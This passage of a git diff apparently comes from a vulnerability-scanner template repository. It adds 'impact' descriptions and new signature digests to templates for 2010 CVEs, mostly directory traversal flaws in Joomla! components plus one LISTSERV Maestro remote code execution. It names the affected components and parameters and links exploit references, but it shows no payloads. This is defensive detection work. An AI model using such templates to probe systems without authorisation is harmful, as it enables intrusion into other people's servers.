@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100d66bb2526cd6fd21a6ae7c7c7c36e79f6449673ab0633d5299e5d639c213074d022100a079157860f11d0e7c4522bc6ee64b110b4b39ab57c3c2c46a99e9c38e947d64:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022024c6cad07f9234d03bda1b47bcff7b62648b645d181fe28d2cfdf9cd1372e1be022100ca59cc8f108f456637034771d6dfe518d39d33e8539d607a963ba328f8acf6a6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml
index 59f5052bed..0851ce5cd1 100644
--- a/http/cves/2010/CVE-2010-1719.yaml
+++ b/http/cves/2010/CVE-2010-1719.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: |
     Apply the latest security patches or updates provided by the Joomla! Component MT Fire Eagle 1.2 vendor.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022020138b379909d2b98b55d8d5e6f1b588f9063645935e13c38038b6166529a9fb022100eee3b2517664caaca450438d2d1ec91248967baa6702fa74cecde689a71bab82:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220142f9dcdd56f429cd511e16b35108914b7eafc2b970541a565bf5a517e3c9e840220363d23a03fae02e91d4ef98823a6c443cb14d0a6d9efac30106888db03c09d13:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml
index ddd42c1da4..333a2aa3a5 100644
--- a/http/cves/2010/CVE-2010-1722.yaml
+++ b/http/cves/2010/CVE-2010-1722.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
   remediation: |
     Apply the latest security patches or updates provided by Joomla! to fix the LFI vulnerability in the Online Market 2.x component.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402201967b4c3c553b85753c96453352662e3f7890a26eb58a993edced6f3be58650c022035e5f1890e59fee34c845574cfbccbce4299a018eec5ef2b1d87d3bce5ad134d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204029fb965c07390c26ef14cd50c268e79b556490205f907ea2518cd51b310187022100fc6c41b9d87e8863813ab20b07ed17cab76497f2ff13b40f2bb722b76ee9224b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml
index 2326b0ee80..3ff52be6ef 100644
--- a/http/cves/2010/CVE-2010-1723.yaml
+++ b/http/cves/2010/CVE-2010-1723.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system.
   remediation: |
     Update to the latest version of the iNetLanka Contact Us Draw Root Map component or apply the patch provided by the vendor to fix the LFI vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502201cc16ba6256c0a7700fd76e341194e4ca6a09969021e24381387dd24f828b260022100db3855c65874d12567c3012a5e88f1c59bca1a6399395707e262c32d9800744c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022025b9b98f4d35753e0c141616a32cc51ad3a7ba2109c5eadcffdf73c6be6d596b02210096818c1f3cb022812038e4df2cbeaee4a59c717b09ae154ceba6ec71683353be:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml
index 980db82714..09c267dabe 100644
--- a/http/cves/2010/CVE-2010-1858.yaml
+++ b/http/cves/2010/CVE-2010-1858.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to unauthorized access and potential data leakage.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/11853
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022028f7506b0d389861b6c14cb8e45f7aad5539739eaa27dc0b483c77de1f8d4ff0022077f110f38f6bfd7515973550ae149bc20180e3f0e5fbf5932244278174539a5b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f608aef30150d5e5c232e9d8dcc6df9cdfd7e21f5ce65d95be6a773a89e08a7202206ba7e3cdef270c98019ad813be0f23b6d5fc484487c52d466c8d0f694ebb3050:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml
index d50675fd6f..3bbf52e59f 100644
--- a/http/cves/2010/CVE-2010-1870.yaml
+++ b/http/cves/2010/CVE-2010-1870.yaml
@@ -5,6 +5,8 @@ info:
   author: b0yd
   severity: medium
   description: A struts-based OGNL remote code execution vulnerability exists in ListSERV Maestro before and including version 9.0-8.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade to a patched version of ListSERV Maestro that is not affected by this vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
           - 'LISTSERV Maestro\s+[5678]'
           - 'Administration Hub 9\.0-[123456780]'
           - 'Administration Hub [5678]'
-# digest: 4a0a00473045022100a242b0189ad97b2d795336624cf531136e407e57b6e0c52c0fc8e4eca692a39a02204f15c177244d9ea3fe83da7eeca74327c80f817d5993bf6ab6c7138792e07cb5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200ef3e6075b857e768a6c73e6ab6b832333c026b5215f724a1c1326d408f7476702210080cedbaf8d0aa28a9ecf41eef8caa268141b32cd8ef87dbfd6c6bf9506c177e7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml
index c2708d5c0c..56261b336d 100644
--- a/http/cves/2010/CVE-2010-1875.yaml
+++ b/http/cves/2010/CVE-2010-1875.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    This vulnerability can result in the exposure of sensitive data, such as configuration files, database credentials, or other sensitive information stored on the server.
   remediation: |
     To remediate this vulnerability, it is recommended to update the affected Joomla! component to the latest version or apply the necessary patches provided by the vendor.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210082eaff0ee8d516e24c4bda026bd64d2c248a32fb9769408dc83c25f73bedbfaf022100fc766d692c0d0efa229ded3594f84a17852493e59583a2b28307dbbed494c325:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210096599b6938468d1724b9c666c12272f8761f1c49b7234c79b9da17d8069660b0022100ae9cad5a44599e30600a668bdaf45f2c7c5933125c8a51761948d9a0edac674f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml
index 5027b915a7..62426ab49f 100644
--- a/http/cves/2010/CVE-2010-1878.yaml
+++ b/http/cves/2010/CVE-2010-1878.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: |
     Apply the latest patch or upgrade to a newer version of the Joomla! Component OrgChart to mitigate the vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100f556a8ecae8a105097cafc748304efd98467005b886d5581307d7c6ae81865df022100d72c132b485850e259696c0787eb84cf71febebeb35edcdc362558b5fbbe9001:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204fe41f3fd8697df9c9c614652c99e747d454f93efd44feb9db9d1713ff84bdd1022041601d6ab93517d57967de9b29c4d524a4020d711d1f56e102ea04795e6c2bd5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml
index 317602d80b..04edc067bb 100644
--- a/http/cves/2010/CVE-2010-1952.yaml
+++ b/http/cves/2010/CVE-2010-1952.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12239
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100bbdb472620fe8b7619082d1034a20032869a7431015b7d1e3b78227c90e345e30220553ca1a44ee7d7ce74d987b448d6cc12e680570cb855abb87493fafcab7b8dd8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b77b1aa781afb8f30a0407d366a5c4b2a339748c0653b543fac57e537f06f0b90220374c1afe6bc15dfb4dbac3f006793b00b9507f2de2358b1d30c92c9b60a2865d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml
index d0d30f8994..8c32ba2958 100644
--- a/http/cves/2010/CVE-2010-1953.yaml
+++ b/http/cves/2010/CVE-2010-1953.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12288
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100b35cca42ac21b6983cc8ed8e8faeb1c08f207601722e06191e199996f0c4ea5a022100a0148ec52a2c91914dabb8cffdd31ca9e044205365100e35a3c97e512945537d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009a8c827a37e9c486aa5fa22a7d5bb958527f763e3356b20a6a00bd7686088a3a02201160221b0ce54c42b9010b07dea23a4285638a613b99006da211d6d2461c513b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml
index 5b09fdd669..9eb526f467 100644
--- a/http/cves/2010/CVE-2010-1955.yaml
+++ b/http/cves/2010/CVE-2010-1955.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12238
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210089eb4102ae44a2ffd45bcbd216308af8b26c7bf5720beb809ada98574dbbafca022039a4babd37caf5eb8dbc07d87a1bf443275ca6ed7c50431525e711958865c5ad:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f4489f8b45d80704037cd3d084a66bed44d825de4f0b0e9976e13041a708d0eb022034251a6380f133fdee626900b4c3e35fe6f53cbb1a0e06226b9af9fa92d5be3d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml
index 2d85939a4c..1b512a94d8 100644
--- a/http/cves/2010/CVE-2010-1956.yaml
+++ b/http/cves/2010/CVE-2010-1956.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12285
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220080495bc9c6b9ab3c198fc6455d36b7e23044d2268509fe920bed5822f0786e4022100f26e0f382f9195769af095ee5855209fbead3a17efe0ec00181fae2b340e42a8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100cd813160bc5df34b92a04ebe5bc25538644b05407f4557d7f1e3699eb2738477022100d6e64050632ee2df63a0646d3c279e06a4169ad9c47bc6234a6bd00febcfe022:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml
index 545668d97c..0a9bca3a17 100644
--- a/http/cves/2010/CVE-2010-1957.yaml
+++ b/http/cves/2010/CVE-2010-1957.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12235
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022071798c7cb01da8bd4310fb461e84ddcad992aa3213671db2ac78fe85c9e22c0f022100f87cd8b7f953e34e4f7a6a65344ad491eeb41d2ec209c7ad93f1f7cea9881eae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f674e133070fef23bfc4ae1cd446c12b63e60dddd20fa2bbf3a6b386b663f9d002210090748da31b933be0ac8c56c26b1a0c81da8b037c7457ed3f7f9de00e6d1b1988:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml
index 85cbdcafac..184d1cd462 100644
--- a/http/cves/2010/CVE-2010-1977.yaml
+++ b/http/cves/2010/CVE-2010-1977.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12083
@@ -37,4 +39,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100e00cc4b75ad7ed3fe500137eea231351e71682b2967f06db378471e92b20492e02200a4efa7715adf1e532dd6858da1b0cb743bbc1b145db3949aed56a06f48fcf84:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f381c6bd2f0253efe1483cbd1ff74b59a37069dfa799e862e6c431de98e344c702202062a659f3bf9bf958e1a4aadbf67e07fb30d90d88140602aaa10158caac3347:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml
index 720316587d..c2e68854c0 100644
--- a/http/cves/2010/CVE-2010-1979.yaml
+++ b/http/cves/2010/CVE-2010-1979.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12088
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220648b163ba23a62b4760d669300fdc055f48cbe973b35b0aa57e6dfb899fe7e3a022044e08f679e2a97632bbf72f81e56239c9b19df9b09198e1d4e97be70d14fbc3f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204d0d7fb9b7ca49039651bba15cdae46e8d3c34eab245c063d2d85a86cd4edb6c022100eda90cae8a943ceabe34fc18d99c354c3c00473ad8b80d22f9c56f449c84633c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1980.yaml b/http/cves/2010/CVE-2010-1980.yaml
index 4ad2eefd05..25c1b9eabf 100644
--- a/http/cves/2010/CVE-2010-1980.yaml
+++ b/http/cves/2010/CVE-2010-1980.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in joomlaflickr.php in the Joomla! Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12085
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022021dc15978a79e101c18758979e7b13c2063785423553fce7e0690ee9157ddd0802206fed8046d2113545d7e7cd869e868130ca7db443430ddbac3249f88d075ca341:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220539f782a9c5542207d586e38c6b76362a601745fa4c623a93ed82ef86c0964bf022047be814d1d5bfbf20ec8397ab00a88cc61feafb3db3673b1a3ff16eafb58d261:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml
index b938122ee1..ee53c321b2 100644
--- a/http/cves/2010/CVE-2010-1981.yaml
+++ b/http/cves/2010/CVE-2010-1981.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12087
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d80b9fc7fb3e35d2dc6047c33f3e7a7cba9925bc1dc99bc13ab184106a8af09f02206dac061cd8719aef9b943e898d44a6b25b552293c451030e89dc552354473fb4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e8dd075c2ff4fcbe1ea6c7990fcc179393d96de943d6da50ee5d4bfb9709eca0022100fa05ee5d0e8996852dbd4c47e067becca1e6317d96ce5cf3a59f4967ea5e8dd0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml
index f1195e034a..2ba73f338c 100644
--- a/http/cves/2010/CVE-2010-1982.yaml
+++ b/http/cves/2010/CVE-2010-1982.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12121
@@ -37,4 +39,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221009b2d29941ae7eccf4af8b3cb8e6cb11621e89186f1f6d4b96ef3dda7828e05650220088fafea1fcb85dd966b8431d7ef52e54b3478bfa59e50ece9d086ff7de74c84:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201c4befc54c58c718425c23978d26d27f5186f121b1526e5ae8e8ba31b03609bb022100fd9f75d9caca461ff58f9e699377a521b225791878c5f76517151fcbf0967697:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml
index 5ad768d414..44e3198e6f 100644
--- a/http/cves/2010/CVE-2010-1983.yaml
+++ b/http/cves/2010/CVE-2010-1983.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A drectory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/12055
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205c03f407c696255cb2181d11f9a488de589f775cb8d1ec9a5fd668d68e7cc3ea02202472c73bd9ac55cdbac6c1605637ebc35bbfb0cdf4d916680a81b88bc6debfda:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206f21979aa6337361f235bf3e8a9d6dbe8f1d9649dcacfe9b1c1cc6c2bc821b56022100f6c096abff5b3c5258c2f2ef595d7277245e11e619fad038a3b45e02ffd10f27:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml
index 919d504232..d417e287d9 100644
--- a/http/cves/2010/CVE-2010-2033.yaml
+++ b/http/cves/2010/CVE-2010-2033.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html
@@ -37,4 +39,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b7369948bb6455f3080ef7570b840bd8d6e2cb0502c00d30f16afa198705d1a402203832fbe6d2fefccf2d349cfb20a3234b3c5c446282667caf02d01ddaa694fb8a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008b85c8dbd2c3d870feaa77152d698d27e68ba3e633388167d223ed2d52f5a4c8022100a81bd1c134ea547ab9327934e70f799d61760947e8c45b6772398819c583c8f1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml
index bf1c825e71..43e2ec117e 100644
--- a/http/cves/2010/CVE-2010-2034.yaml
+++ b/http/cves/2010/CVE-2010-2034.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    An attacker can exploit this vulnerability to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/34003
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022008b630abf7eb18bc19fc250229e81145829391209c282e3ffe156e6d2a32f03c02205e1f52dbcca831a745cf5b0699da12b42f4772ed70524628883c9b0a08a0ce6f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100aa640c948119b286df93f9be8d64309532b2e40defe14624efb45252ffe48c63022100b9bebade79b7fd6623d04434246593e6f22a9dfe5df5ebf2b7932d6ebf35060d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml
index 8ea3c47ad7..764f39ae1a 100644
--- a/http/cves/2010/CVE-2010-2035.yaml
+++ b/http/cves/2010/CVE-2010-2035.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/34006
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220017288c38316efe9ecaf7e3c142862f23518a6851bc51f924558f5ff05bb83b8022100d9302c9594c308c29f7f48b6429a999042c09667062927e170c4d7a35aa8e4f2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b34c29fe1f1c74fdfb477df382907e0e678ec8d0edef26b57955499820762075022056655cc35c216a2779bbcc446a466020f32a142cd247877a81d90150317332a0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml
index b7cbb57e1b..d198971167 100644
--- a/http/cves/2010/CVE-2010-2036.yaml
+++ b/http/cves/2010/CVE-2010-2036.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/34004
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b3d5e11463fea00fc8ea6c39d3ebb2b6faca82dbb003d2df97948afa39ce5fb5022040dfaa69076440e97c55326590c4101742e97363038e7f21817724e757cdeb8a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022018b41597188ecdf7078080c36fb2f00046dcf374f659900b130a457b29f0c7a80220146c0933b38da8fa58556f877044de2d95444dc063a86de47bb213ce4cfe97ed:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml
index 52bb29f154..2a84ad43d9 100644
--- a/http/cves/2010/CVE-2010-2037.yaml
+++ b/http/cves/2010/CVE-2010-2037.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    This vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/34005
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
